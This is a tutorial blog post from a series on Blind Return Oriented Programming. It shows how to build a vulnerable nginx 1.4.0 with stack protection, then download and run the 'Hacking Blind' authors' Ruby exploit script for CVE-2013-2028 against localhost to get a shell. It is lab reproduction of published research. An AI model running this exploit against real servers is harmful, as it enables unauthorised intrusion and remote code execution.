This topic consists of 3 sessions:

• BROP Principle - dump memory to attacker and do exploit
• BROP Practice1 - attack conduct
• BROP Practice2 - code analysis

Blind Return Oriented Programming (BROP) Website

Hacking Blind: paper and slide

Following the 1st session, which talked about the principle of BROP attack, this page will discuss about how to conduct the real exploit in a Linux system.

This session is more like a kind of tutorial about how I conduct one of the 3 attacks conducted by the authors (specifically, attack nginx 1.4.0 with a buffer overflow bug - CVE-2013-2028, and finally can execute the shell) in my PC.

Setting Up Nginx-1.4.0

At first, we need to setup the server environment: nginx 1.4.0.

Download the nginx 1.4.0 source code:

$ wget nginx.org/download/nginx-1.4.0.tar.gz
$ tar zxvf nginx-1.4.0.tar.gz
$ cd nginx-1.4.0
$ ./configure --sbin-path=/usr/local/nginx/nginx --conf-path=/usr/local/nginx/nginx.conf --pid-path=/usr/local/nginx/nginx.pid --with-http_ssl_module

Before compiling, modify the makefile with stack canary protection:

$ vi obj/Makefile

1
2
3

...
CFLAGS = -pipe -O -W -Wall -Wpointer-arith -Wno-unused-parameter -Werror -g -fstack-protector
...

Then compile it:

$ make -j4
$ sudo make install

At this point, it is installed in the /usr/local/nginx folder. If you use checksec.sh to check it:

$ wget www.trapkit.de/tools/checksec.sh
$ chmod +x ./checksec.sh
$ ./checksec.sh --file /usr/local/nginx/nginx

You will get following result:

Which means it already has NX and Stack canary protection.

Before running nginx, we need to modify its configuration to make it run with 4 worker processes:

$ vi /usr/local/nginx/nginx.conf

1
2
3

#user  nobody
worker_processes 4;
...

Then we just run it with:

$ sudo /usr/local/nginx/nginx

Exploit BROP Attack

Now let’s see how to do the BROP attack. It is quite simple, since the authors have already write a nginx specific attack script using ruby.

Download the exploit script:

$ wget www.scs.standford.edu/brop/nginx-1.4.0-exp.tgz
$ tar zxvf nginx-1.4.0-exp.tgz
$ cd nginx-1.4.0-exp

And run it by simply executing:

$ ./brop.rb 127.0.0.1

If everything is ok, then it will exploit the nginx-1.4.0 using the approach I talked about here, and finally print the id of the exploited shell’s owner:

If there’s any problem, and you want to rerun the script, you should first remove the state.bin file, or even restart nginx, and run brop.rb again:

$ rm -f ./state.bin
$ ./brop.rb 127.0.0.1

That’s done!

In the following session, I will try to analyse the ruby script, and show how they do the attack in code aspect.